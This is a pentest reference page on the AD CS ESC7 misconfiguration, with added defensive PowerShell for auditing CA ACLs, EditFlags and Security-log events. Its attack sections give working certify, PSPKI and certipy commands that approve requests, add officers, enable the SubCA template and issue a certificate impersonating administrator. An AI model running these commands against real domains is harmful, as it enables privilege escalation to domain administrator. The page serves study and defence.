ESC7
Vulnerable Certificate Authority Access Control
Two sets of permissions on the CA pose a security risk:
- ManageCA
- ManageCertificates (or Certificate Manager)
Enumerate using certsrv.msc
```powershell
PS /home/bobbuilder> Get-CertificationAuthority -ComputerName dc.domain.local | Get-CertificationAuthorityAcl | select -expand Access
```
Query the CA with certutil (EditFlags value). EDITF_ATTRIBUTESUBJECTALTNAME2 is set if the returned value is 1376590.
```powershell
PS /home/bobbuilder> certutil.exe -config "LAB-DC.lab.local\lab-LAB-DC-CA" -getreg "policy\EditFlags"
```
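The value check above compares against one magic number. The following added example (not part of the original page) parses the certutil output and tests the EDITF_ATTRIBUTESUBJECTALTNAME2 bit itself (0x40000 = 262144), which generalizes to any EditFlags value: 1376590 = 0x15014E has the bit set, and 1114446 = 0x11014E is the same configuration with the bit cleared. The certutil output embedded below is constructed, and the CA name is the one used on this page.

```powershell
# Added example (not from the original page): parse the EditFlags value that
# "certutil -getreg policy\EditFlags" prints and test the
# EDITF_ATTRIBUTESUBJECTALTNAME2 bit (0x40000 = 262144) directly instead of
# comparing against one magic number.

$EDITF_ATTRIBUTESUBJECTALTNAME2 = 0x40000

# Constructed sample of certutil output (not captured from a real CA).
$SampleCertutilOutput = @'
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\CertSvc\Configuration\lab-LAB-DC-CA\PolicyModules\CertificateAuthority_MicrosoftDefault.Policy:

  EditFlags REG_DWORD = 15014e (1376590)
    EDITF_REQUESTEXTENSIONLIST -- 2
    EDITF_DISABLEEXTENSIONLIST -- 4
    EDITF_ADDOLDKEYUSAGE -- 8
    EDITF_BASICCONSTRAINTSCRITICAL -- 40 (64)
    EDITF_ENABLEAKIKEYID -- 100 (256)
    EDITF_ENABLEDEFAULTSMIME -- 10000 (65536)
    EDITF_ATTRIBUTESUBJECTALTNAME2 -- 40000 (262144)
    EDITF_ENABLECHASECLIENTDC -- 100000 (1048576)
CertUtil: -getreg command completed successfully.
'@

function Get-EditFlagsFromCertutil {
    # Extract the hexadecimal EditFlags value from certutil text output.
    param([Parameter(Mandatory)][string]$Text)
    if ($Text -match 'EditFlags\s+REG_DWORD\s*=\s*([0-9a-fA-F]+)') {
        return [Convert]::ToInt32($Matches[1], 16)
    }
    throw 'EditFlags value not found in certutil output'
}

function Test-SanAttributeFlag {
    # True when EDITF_ATTRIBUTESUBJECTALTNAME2 is set in the given EditFlags value.
    param([Parameter(Mandatory)][int]$EditFlags)
    return (($EditFlags -band $EDITF_ATTRIBUTESUBJECTALTNAME2) -ne 0)
}

# Offline run against the constructed sample. On a real CA, replace the sample with:
#   $text = certutil.exe -config "LAB-DC.lab.local\lab-LAB-DC-CA" -getreg "policy\EditFlags" | Out-String
$flags = Get-EditFlagsFromCertutil -Text $SampleCertutilOutput
'EditFlags = {0} (0x{0:X})' -f $flags
if (Test-SanAttributeFlag -EditFlags $flags) {
    # Same value with the SAN bit cleared; for 1376590 this is 1114446.
    $hardened = $flags -bxor $EDITF_ATTRIBUTESUBJECTALTNAME2
    Write-Warning ("EDITF_ATTRIBUTESUBJECTALTNAME2 is set; requesters can add arbitrary SANs. " +
                   "Value with the bit cleared: $hardened")
} else {
    'EDITF_ATTRIBUTESUBJECTALTNAME2 is not set.'
}
```

Testing the bit rather than the whole number avoids false negatives on CAs whose other EditFlags bits differ from this lab's 1376590.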
Enumerate using the PSPKI module
```powershell
PS /home/bobbuilder> Import-Module .\PSPKI.ps1
PS /home/bobbuilder> Get-CertificationAuthority -ComputerName LAB-DC.lab.local | Get-CertificationAuthorityAcl | select -ExpandProperty access
```
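The ACL listing above is what an auditor reviews for ESC7. The added example below (not from the original page or from PSPKI) turns that review into a function: it accepts ACE objects shaped like the entries Get-CertificationAuthorityAcl returns (IdentityReference, AccessControlType and a rights property, which older PSPKI builds name CertificationAuthorityRights and newer ones Rights) and reports every ManageCA or ManageCertificates holder that is not on an allow-list. The allow-list and the sample ACL are assumptions constructed for the lab domain.

```powershell
# Added example (not from the original page): review the CA ACL for ManageCA /
# ManageCertificates holders and flag any principal that is not on an allow-list.

function Find-CAPrivilegedAces {
    param(
        # ACE objects, e.g. (Get-CertificationAuthority ... | Get-CertificationAuthorityAcl).Access
        [Parameter(Mandatory)][object[]]$Access,
        # Assumed allow-list for the lab domain; adapt to your environment.
        [string[]]$ExpectedHolders = @('BUILTIN\Administrators', 'LAB\Domain Admins', 'LAB\Enterprise Admins')
    )
    foreach ($ace in $Access) {
        # Older PSPKI builds expose CertificationAuthorityRights, newer ones Rights; accept either.
        $rightsProp = $ace.PSObject.Properties |
            Where-Object { $_.Name -in 'Rights', 'CertificationAuthorityRights' } |
            Select-Object -First 1
        if (-not $rightsProp) { continue }
        $rights = [string]$rightsProp.Value
        if ($rights -notmatch 'ManageCA|ManageCertificates') { continue }
        $identity = [string]$ace.IdentityReference
        [pscustomobject]@{
            Identity   = $identity
            Rights     = $rights
            AccessType = [string]$ace.AccessControlType
            Unexpected = ($ExpectedHolders -notcontains $identity)
        }
    }
}

# Constructed sample ACL (not taken from a real CA): the third entry is the kind of
# finding ESC7 is about, a regular user holding ManageCA.
$SampleAccess = @(
    [pscustomobject]@{ IdentityReference = 'BUILTIN\Administrators'; Rights = 'ManageCA, ManageCertificates'; AccessControlType = 'Allow' }
    [pscustomobject]@{ IdentityReference = 'LAB\Domain Users';       Rights = 'Read, Enroll';                 AccessControlType = 'Allow' }
    [pscustomobject]@{ IdentityReference = 'LAB\bobbuilder';         Rights = 'ManageCA';                     AccessControlType = 'Allow' }
)

Find-CAPrivilegedAces -Access $SampleAccess | Format-Table -AutoSize

# Live use (PSPKI required):
#   Import-Module PSPKI
#   $acl = Get-CertificationAuthority -ComputerName LAB-DC.lab.local | Get-CertificationAuthorityAcl
#   Find-CAPrivilegedAces -Access $acl.Access | Where-Object Unexpected
```

Run periodically, the Unexpected column is the finding to act on: any non-administrative principal holding ManageCA can enable templates and grant itself ManageCertificates, which is exactly the chain the attacks below rely on.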
ManageCA
A principal with ManageCA can manipulate CA settings remotely using PSPKI. This includes toggling the EDITF_ATTRIBUTESUBJECTALTNAME2 flag to permit SAN specification in any template, a critical aspect of domain escalation.
Windows
Attack 1
The ESC6 attack was patched in May 2022.
Note: toggling the flag has no effect until the CA service (CertSvc) is restarted; ManageCA users have that right, but they cannot restart the service remotely.
- Request a certificate from the template
```powershell
PS /home/bobbuilder> certify.exe request /ca:<ca> /template:ApprovalNeeded
```
- Import the PSPKI module
```powershell
Import-Module PSPKI
```
- Approve the pending request
```powershell
PS /home/bobbuilder> Get-CertificationAuthority -ComputerName dc.domain.local | Get-PendingRequest -RequestID 336 | Approve-CertificateRequest
```
- Download the approved request
```powershell
PS /home/bobbuilder> certify.exe download /ca:<ca> /id:336
```
Attack 2
For this attack we only need the ManageCA permission. The Manage Certificates permission and an enabled SubCA certificate template are also needed, but both can be enabled by a principal with ManageCA.
- Grant Manage Certificates access (optional, if we don't have it already)
```bash
certipy ca -ca 'corp-DC-CA' -add-officer john -username john@corp.local -password Passw0rd
```
- Enable the SubCA certificate template (optional, if it isn't already)
```bash
certipy ca -username john@corp.local -password Passw0rd! -target-ip ca.corp.local -ca 'corp-CA' -enable-template 'SubCA'
```
- Request a certificate based on the SubCA template
```bash
certipy req -username john@corp.local -password Passw0rd -ca corp-DC-CA -target ca.corp.local -template SubCA -upn administrator@corp.local
```
- Issue the failed certificate request
```bash
certipy ca -ca 'corp-DC-CA' -issue-request 785 -username john@corp.local -password Passw0rd
```
- Retrieve the issued certificate
```bash
certipy req -username john@corp.local -password Passw0rd -ca corp-DC-CA -target ca.corp.local -retrieve 785
```
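Both attacks leave a recognisable trail in the CA host's Security log once Certification Services auditing is on. The added example below (not from the original page) triages those events: officer or permission changes (4882, 4890), CA property changes such as EditFlags or enabled templates (4892), and request lifecycle events (4886, 4889, 4887), with issuance from the SubCA template rated high. The prerequisite is the standard CA audit configuration, certutil -setreg CA\AuditFilter 127 plus the "Audit Certification Services" subcategory, which is not described on this page; the sample events are constructed and the request ID and requester mirror the Attack 2 steps.

```powershell
# Added example (not from the original page): triage Security-log events a CA host
# records while ESC7-style changes and requests happen. Event IDs are the documented
# Certification Services audit IDs; the sample events below are constructed.

$CaEventMeaning = @{
    4882 = 'CA security permissions changed (ManageCA / ManageCertificates grant?)'
    4890 = 'Certificate manager (officer) settings changed'
    4892 = 'CA property changed (EditFlags, enabled templates, ...)'
    4886 = 'Certificate request received'
    4889 = 'Certificate request set to pending'
    4887 = 'Certificate request approved and certificate issued'
}

function Find-EscActivity {
    param(
        # Objects with Id, TimeCreated and Message, e.g. from Get-WinEvent.
        [Parameter(Mandatory)][object[]]$Events,
        # Templates whose issuance deserves a closer look; SubCA is the one ESC7 abuses.
        [string[]]$SensitiveTemplates = @('SubCA')
    )
    foreach ($e in $Events) {
        if (-not $CaEventMeaning.ContainsKey([int]$e.Id)) { continue }
        $requestId = if ($e.Message -match 'Request ID:\s*(\d+)') { $Matches[1] } else { $null }
        $template  = if ($e.Message -match 'CertificateTemplate:([^\s,]+)') { $Matches[1] } else { $null }
        # Configuration changes are always high; issuance is high only for sensitive templates.
        $severity = switch ([int]$e.Id) {
            { $_ -in 4882, 4890, 4892 } { 'High' }
            4887 { if ($template -in $SensitiveTemplates) { 'High' } else { 'Info' } }
            default { 'Info' }
        }
        [pscustomobject]@{
            Time      = $e.TimeCreated
            Id        = $e.Id
            Severity  = $severity
            RequestId = $requestId
            Template  = $template
            Meaning   = $CaEventMeaning[[int]$e.Id]
        }
    }
}

# Constructed sample events mirroring the Attack 2 sequence (not real log data).
$SampleEvents = @(
    [pscustomobject]@{ Id = 4882; TimeCreated = '2024-01-01 10:00'; Message = 'The security permissions for Certificate Services changed.' }
    [pscustomobject]@{ Id = 4892; TimeCreated = '2024-01-01 10:01'; Message = 'A property of Certificate Services changed. Property: Templates' }
    [pscustomobject]@{ Id = 4886; TimeCreated = '2024-01-01 10:02'; Message = "Certificate Services received a certificate request.`nRequest ID:`t785`nRequester:`tCORP\john`nAttributes:`tCertificateTemplate:SubCA" }
    [pscustomobject]@{ Id = 4887; TimeCreated = '2024-01-01 10:03'; Message = "Certificate Services approved a certificate request and issued a certificate.`nRequest ID:`t785`nRequester:`tCORP\john`nAttributes:`tCertificateTemplate:SubCA" }
    [pscustomobject]@{ Id = 4624; TimeCreated = '2024-01-01 10:04'; Message = 'An account was successfully logged on.' }
)

Find-EscActivity -Events $SampleEvents | Format-Table -AutoSize

# Live use on the CA host:
#   $events = Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4882, 4886, 4887, 4889, 4890, 4892 }
#   Find-EscActivity -Events $events | Where-Object Severity -eq 'High'
```

A 4882 or 4890 followed within minutes by a 4887 for the SubCA template from a non-administrative requester is the sequence Attack 2 produces; the unrelated 4624 in the sample is dropped to show the filter only keeps CA events.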
Permissions and template involved: ManageCA, Manage Certificates and SubCA
Disable EDITF_ATTRIBUTESUBJECTALTNAME2 with PowerShell
```powershell
# $ConfigReader is PSPKI's remote CA registry manager; the page shows only the
# Set/Get calls, so these two setup lines are an assumption (adjust the host name).
$ConfigReader = New-Object SysadminsLV.PKI.Dcom.Implementations.CertSrvRegManagerD "dc.domain.local"
$ConfigReader.SetRootNode($true)
# 1114446 is 1376590 with the 0x40000 (EDITF_ATTRIBUTESUBJECTALTNAME2) bit cleared
$ConfigReader.SetConfigEntry(1114446,"EditFlags","PolicyModules\CertificateAuthority_MicrosoftDefault.Policy")
# Read the value back to confirm the change; CertSvc must be restarted for it to take effect
$ConfigReader.GetConfigEntry("EditFlags","PolicyModules\CertificateAuthority_MicrosoftDefault.Policy")
```